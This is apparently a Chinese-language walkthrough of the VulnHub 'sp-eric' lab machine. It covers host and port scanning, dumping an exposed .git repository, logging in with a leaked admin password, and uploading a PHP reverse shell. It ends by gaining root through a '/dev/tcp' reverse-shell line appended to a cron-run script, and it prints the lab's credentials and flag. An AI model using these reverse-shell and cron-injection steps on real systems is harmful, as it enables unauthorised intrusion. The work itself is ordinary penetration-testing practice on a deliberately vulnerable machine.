靶机下载地址:
https://www.vulnhub.com/entry/sp-eric,274/
https://www.vulnhub.com/entry/sp-eric,274/
1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:75:19:80'

1.2. 端口扫描
nmap 192.168.7.104 -p- -A

1.3. 目录扫描
dirb http://192.168.7.104

1.4. 敏感信息获取
whatweb http://192.168.7.104

2. WEB网站漏洞挖掘
2.1. 进入http,80端口
主页面无发现

2.2. 拼接扫描出的目录
2.2.1. 拼接/.git/HEAD

1.尝试使用 githack 下载源码看看;
工具链接
https://github.com/lijiejie/GitHack
===================================================================
python2 GitHack.py -u http://192.168.7.104/.git/

2.查看下载下的文件,发现 admin.php 中存在一对账号密码
admin:st@mpch0rdt.ightiRu$glo0mappL3

2.2.2. 拼接/admin.php
1.发现是一个登录

2.尝试用刚才得到的账号密码登录一下 -> 成功登录

疑似存在文件上传漏洞

2.2.3. GetShell
1.存在文件上传
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .

2.修改 IP 和端口为kali及kali的监听端口;
vim php-reverse-shell.php
nc -lvnp 4444


3.将编辑好的.php文件,利用网页上传功能上传;

4.访问 /upload/php-reverse-shell.php,kali成功反弹


5.利用 python 生成更具交互性的交互shell界面
python3 -c 'import pty;pty.spawn("/bin/bash")'
老规矩 sudo -l 查看文件权限信息,但是需要密码

6.在 /home/eric 翻看文件 -> 存在三个可能可疑利用的文件
cd /home/eric
ls -al

先看 flag.txt 夺个旗;
cat flag.txt
>>> 89340a834323

查看 backup.sh 脚本文件;
cat backup.sh

查看一下计划任务
cat /etc/crontab

7.我们通过查看目录中的文件权限,已知 backup.sh 文件具有编辑权限;
打开kali监听,尝试写入反弹shell的语句 -> 成功提权
nc -lvnp 5555
echo 'bash -i >& /dev/tcp/192.168.7.36/5555 0>&1' >> backup.sh


